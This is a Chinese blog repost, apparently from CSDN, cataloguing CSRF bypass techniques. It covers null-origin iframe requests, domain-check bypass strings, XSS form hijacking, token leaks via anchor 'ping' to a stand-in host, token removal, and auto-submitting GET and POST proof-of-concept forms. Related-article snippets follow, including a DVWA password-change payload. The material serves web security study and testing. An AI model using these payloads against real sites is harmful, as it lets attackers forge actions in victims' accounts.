CSRF的绕过与利用

最新推荐文章于 2024-05-19 17:05:33 发布
最新推荐文章于 2024-05-19 17:05:33 发布
阅读量193 收藏 1
点赞数
分类专栏: web 文章标签: csrf
原文链接:https://threezh1.com/2020/02/25/CSRF%E7%BB%95%E8%BF%87%E6%95%B4%E7%90%86/
版权

Threezh1’Blog
转载至:https://threezh1.com/2020/02/25/CSRF%E7%BB%95%E8%BF%87%E6%95%B4%E7%90%86/
CSRF的绕过与利用

February 25th 2020, 12:00:00 pm

目录

  1. Origin & Referer Bypass
    1. Null值绕过
    2. 域名校验绕过
    3. 配合XSS进行利用
      1. 获取表单中的token
      2. 获取url参数中的token
    4. 配合URL跳转漏洞
  2. X-Request-with Bypass
  3. Token Bypass
  4. CSRF POC 构造
    1. GET - CSRF
    2. POST - CSRF
  5. 参考 & 备份

Origin & Referer Bypass

Null值绕过

当遇到一个cors可用null值绕过时,用iframe配合data协议,就可以发送一个origin为null的请求。这个绕过方式同样也可以用在CSRF这里。

<iframe sandbox="allow-scripts allow-top-navigation allow-forms" src='data:text/html,<script>var req=new XMLHttpRequest();req.onload=reqListener;req.open("get","http://127.0.0.1/test.html",true);req.withCredentials=true;req.send();function reqListener(){alert(this.responseText)};</script>'></iframe>

域名校验绕过

当域名校验不是特别严格时,可以通过以下几种方式进行绕过:

  • 在后面加域名 qq.com => qq.com.abc.com
  • 将域名拼接 abc.qq.com => abc_qq.com
  • 在前面或者在后面加字符 qq.com => abcqq.com / qq.com => qq.comabc.com / qq.com => abc.com/qq.com

配合XSS进行利用

当同源网站中存在一个xss漏洞时,就可以直接使用xss包含CSRF的payload进行利用。不仅可以绕过简单的Referer和Origin验证,还可以劫持表单与URL中的token进行利用。

获取表单中的token

当token存在于表单中时,可以配合XSS漏洞进行表单劫持进而让token的限制。

  • xss劫持页面中某个表单的提交

像这个就可以劫持user-edit表单的提交,点击即可提交form表单。

<input type="submit" form="user-edit" value="hijack">

这个就相当于劫持了user-edit表单然后进行提交

  • xss劫持页面表单并修改value
<input type="text" form="user-edit" name="notes" value="This is a test">
<input type="text" form="user-edit" name="secert" value="on">
<input type="submit" form="user-edit" value="hijack">

劫持user-edit表单,覆盖各表单的value,进行CSRF利用。

获取url参数中的token
<a href="https://evil7.cn">get_token</a>
<a href="https://xz.aliyun.com/" ping="https://evil7.cn">ping_leak</a>

参考:魔法才能打败魔法:关于获取csrf-token前端技巧思考

配合URL跳转漏洞

如果是GET形式的CSRF,配合URL跳转漏洞,即可Origin和Referer的限制。

X-Request-with Bypass

使用swf进行绕过:https://github.com/Qclover/CSRF

Token Bypass

  • 删除Token参数字段
  • 将Token参数值置空

CSRF POC 构造

GET - CSRF

<img src=http://xxxx.org/csrf.php?xx=11 />

POST - CSRF

可以直接使用Brupsuite生成CSRF POC,也可以自己构造

<form action=http://aaaaaa.org/csrf.php method=POST>
<input type="text" name="xx" value="11" />
</form>
<script> document.forms[0].submit(); </script>

参考 & 备份

明月清风~~
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CSRF绕过方法与利用
weixin_50464560的博客
10-01 3001
转载至https://threezh1.com/2020/02/25/CSRF%E7%BB%95%E8%BF%87%E6%95%B4%E7%90%86/ Origin & Referer BypassNull值绕过当遇到一个cors可用null值绕过时,用iframe配合data协议,就可以发送一个origin为null的请求。这个绕过方式同样也可以用在CSRF这里。 1<iframe sandbox="allow-scripts allow-top-navigation allow-fo
CSRF(跨站请求伪造)漏洞
weixin_50464560的博客
08-25 1295
CSRF(Cross-site request forgery) 跨站请求伪造,由客户端发起,是一种劫持受信任用户向服务器发送非预期请求的攻击方式,与XSS相似,但比XSS更难防范,常与XSS一起配合攻击 原理详解 攻击者盗用了你的身份信息,以你的名义发送恶意请求,对服务器来说这个请求是你发起的,却完成了攻击者所期望的一个操作 漏洞危害 修改用户信息,修改密码,以你的名义发送邮件、发消息、盗取你的账号等 攻击条件 用户已登录存在CSRF漏洞的网站 用户需要被诱导打开攻击者构造的恶意网站 攻击过程 .
CSRF 攻击实验:Token 不与 Session 绑定绕过验证
最新发布
Flag少侠的博客
05-19 3972
CSRF(Cross-Site Request Forgery),也称为XSRF,是一种安全漏洞,攻击者通过欺骗用户在受信任网站上执行非自愿的操作,以实现未经授权的请求。CSRF攻击利用了网站对用户提交的请求缺乏充分验证和防范的弱点。攻击者通常通过在受信任网站上构造恶意的请求链接或提交表单,然后诱使用户点击该链接或访问包含恶意表单的页面。当用户执行了这些操作时,网站会自动发送请求,包含用户的身份验证信息,而用户并不知情。在这个示例中,攻击者可能在自己的网站上构造一个页面,包含上述代码。
CSRF攻击(3), 绕过token检测
探测???
11-03 479
由于token是自包含的,并且通常不依赖于特定的域或会话,它们可以用于不同域之间的身份验证,这在构建微服务、单页面应用(SPA)、移动应用或跨域API服务时特别有用。是基于服务器的身份验证机制。Token验证(尤其是JWT)确实在某些方面提供了比传统Session验证更多的灵活性和扩展性,特别是在构建跨域、微服务架构、无服务器架构、单页面应用(SPA)和移动应用等现代Web应用时。总结来说,选择Session还是Token,应该根据应用的具体需求、预期的扩展性、开发的复杂性以及安全性需求来决定。
CSRF-代码审计+检测绕过
xiaoheizi的博客
07-02 302
数据包保存为html文件导出,打开文件删除除了添加管理员用户的其他表单,将文件放到服务器让目标管理员访问。检测代码的意思就是:收到请求时检测请求里的referer值是否和Host值相同,不相同就不执行请求。2.借目标——在目标网站寻找可上传地方,上传请求数据包,获取目标同域名访问地址。1.伪造——需要在添加管理员用户的请求数据包文件中”固定来源“3.复现失败——看代码——完美过滤(无法绕过)——没有漏洞。2.复现失败——看代码——缺陷过滤(成功绕过)——有漏洞。目标管理员访问链接,成功创建管理员用户。
CSRF攻击(2), 绕过Referer防御
探测???
11-02 747
这里可以看到 Referer 中由于包含了文件名, 所以就间接包含有目标服务器的ip, 绕过了后端对 SERVER_NAME 的判断, 密码修改成功.这里看到表单类型的链接, 点击后 Referer 只包含攻击者的ip, 并没有目标ip, 因此被防御.策略,这将导致浏览器在Referer头中发送完整的URL,为了避免出现这种情况, 可以在HTML文件中使用。当使用一个普通的表单类型的钓鱼链接时, 比如。, 浏览器会根据这个策略发送Referer头.标签会指示浏览器在发送请求时使用。
csrf绕过Referer技巧-01
09-15
CSRF绕过Referer技巧详解 CSRF(Cross-Site Request Forgery,跨站请求伪造)是一种常见的Web攻击方式,攻击者可以通过构造恶意页面诱骗用户执行非法操作。为了防御CSRF攻击,Web开发者通常会使用Referer头来判断...
rosettaflash:一种用于处理SWF文件的工具,利用zlib来制作仅字母数字的有效SWF文件,以便由于JSONP滥用而允许CSRF绕过SOP
03-01
14.0.0.137之前的编译器没有适当地限制SWF文件格式,从而使远程攻击者可以通过精心制作的OBJECT元素来对JSONP端点进行跨站点请求伪造(CSRF)攻击,并获取敏感信息,而SWF内容应满足以下条件:设置回调API的要求。...
CSRF demo代码
02-04
但是,CSRF攻击能绕过同源策略,因为它们利用的是用户自身浏览器的信任。 3. **GET与POST请求**:CSRF攻击更常见于GET请求,因为它们会被浏览器缓存并在浏览器历史记录中显示。但POST请求也可能受到攻击,尤其是在...
XSRFProbe:主要跨站点请求伪造(CSRF)审核和利用工具包
05-03
配备了功能强大的搜寻引擎和许多系统的检查功能,它能够检测大多数CSRF漏洞,其相关的绕过情况,并进一步针对每个发现的漏洞生成(恶意)可利用的概念证明。 有关XSRFProbe如何工作的更多信息,请参阅的。 •••...
linkvertise-bypass:Linkvertise绕过脚本
05-30
在Linkvertise绕过脚本中,JavaScript被用来解析和操纵网页元素,以模拟用户行为或者利用服务的潜在漏洞,从而达到绕过广告或注册墙的目的。这通常涉及对HTTP请求的拦截、分析以及响应的篡改,以确保用户能够无阻碍...
83.WHUCTF之CSS注入、越权、csrf-token窃取及XSS总结_杨秀璋的专栏-CSDN博客1
08-03
声明:本人坚决反对利用教学方法进行犯罪的行为,一切犯罪行为必将受到严惩,绿色网络需要我们共同维护,更推荐大家了解它们背后的原理,更好地进行防护。前文学习:[网络
「网络安全渗透」如果你还不懂CSRF?这一篇让你彻底掌握
yinjiyufei的博客
01-14 3216
「网络安全渗透」如果你还不懂CSRF?这一篇让你彻底掌握
csrf绕过token
Bu2n的博客
02-12 1611
以pikachu靶场为例,绕过token讲解 https://www.bilibili.com/video/BV1qm4y1Z7o5/ 钓鱼网站源码 pikachu_csrf_token.html <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>Document</title> </head> <body>
csrf漏洞防御方案_绕过CSRF防御
weixin_33372672的博客
01-26 797
CSRF漏洞很容易就可以被发现并利用。一眼看去很多站点好像在这方面都做得不错:当你检查针对敏感操作的请求时,他们往往会实施CSRF保护。有时候可能是一个在请求主体中的CSRF token,也有可能是一个referer字段检测,或者有时是一个特殊的HTTP头字段或者cookie字段。但是CSRF的防御不代表它就不可以被绕过。今天我们讨论一些我如何绕过CSRF防御措施的技术。所有的CSRF不管哪种CS...
DVWA-CSRF跨站请求伪造全等级绕过方法
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
12-17 3630
CSRF--DVWA全等级绕过前言一、low级别二、Medium级别三、High级别四、Impossible级别总结 前言 CSRF,跨站请求伪造,Cross-site request forgery 受害者:用户在当前已登录的Web应用程序上执行非本意的操作。 攻击者:攻击者欺骗浏览器,让其以受害者的名义执行自己想要的操作。 一、low级别 二、Medium级别 三、High级别 四、Impossible级别 总结     本站所有文章均为原创,欢迎转载,请注明文章
CSRF 绕过Referer技巧
2ed
10-14 1199
1.Refere为空条件下 解决方案: 利用ftp://,http://,https://,file://,javascript:,data:这个时候浏览器地址栏是file://开头的,如果这个HTML页面向任何http站点提交请求的话,这些请求的Referer都是空的。 例: 利用data:协议 <html> <body> <iframe sr...
CSRF跨站请求伪造和XSS跨站脚本攻击(Sesion和Token的漏洞)
cxywangshun的博客
11-09 3568
CSRF跨站请求伪造和XSS跨站脚本攻击(Sesion和Token的漏洞) 一:Session,Token概述 Sesion是保存在用户本地Cookie里面的,服务器端页保存了一份,每次请求会比较一次 Token是服务器返还给浏览器端的,保存在浏览器本地存储里面,服务器端不保存这个,每次请求也不带着,这个需要前端通过JS来获取到浏览器本地的Token。 二:CSRF漏洞概述 **CSRF(Cross Site Request Forgery)**一般被翻译为 跨站请求伪造 。那么什么是 跨站请求伪造 呢?
CSRF跨站请求伪造
Gjqhs的博客
03-02 709
CSRF跨站请求伪造 原理总结 一个CSRF漏洞攻击的实现,其需要由“三个部分”来构成 1、有一个漏洞存在(无需验证、任意修改后台数据、新增请求); 2、伪装数据操作请求的恶意链接或者页面; 3、诱使用户主动访问或登录恶意链接,触发非法操作: 第一部分 漏洞的存在 关键字:跨站请求漏洞(CSR:CrossSiteRequest) 如果需要CSRF攻击能够成功,首先就需要目标站点或系统存在一个可以进行数据修改或者新增操作,且此操作被提交后台后的过程中,其未提供任何身份识别或校验的参数。后台只要收到..
dvwa中利用xss漏洞绕过csrf漏洞
05-20
在DVWA中,可以使用以下步骤来利用XSS漏洞绕过CSRF漏洞: 1. 打开DVWA,进入CSRF页面。在这个页面上,你将需要创建一个新的帖子。 2. 在新帖子的标题中,我们可以插入一段XSS代码,例如:`<script>document.forms[0].submit();</script>`。这段代码将会自动提交我们的表单。 3. 然后,在新帖子的内容中,我们可以插入一个隐藏的表单,该表单将执行一个CSRF攻击。例如:`<form action="http://localhost/dvwa/vulnerabilities/csrf/" method="post"><input type="hidden" name="password_new" value="newpassword"><input type="hidden" name="password_conf" value="newpassword"><input type="hidden" name="Change" value="Change"></form>`。 4. 最后,我们将在新帖子中插入一个图片,该图片的源地址指向我们刚刚创建的表单。例如:`<img src="http://localhost/dvwa/vulnerabilities/csrf/?password_new=newpassword&password_conf=newpassword&Change=Change" width="1" height="1">`。 5. 提交这个新帖子后,XSS代码将自动执行,并且隐藏的表单将会被提交,从而完成了CSRF攻击。 需要注意的是,这种方法只能用于绕过一些较为简单的CSRF防御措施,对于一些较为严格的防御措施是无效的。因此,在实际应用中,我们应该采取更为严格的防御措施,以确保系统的安全性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值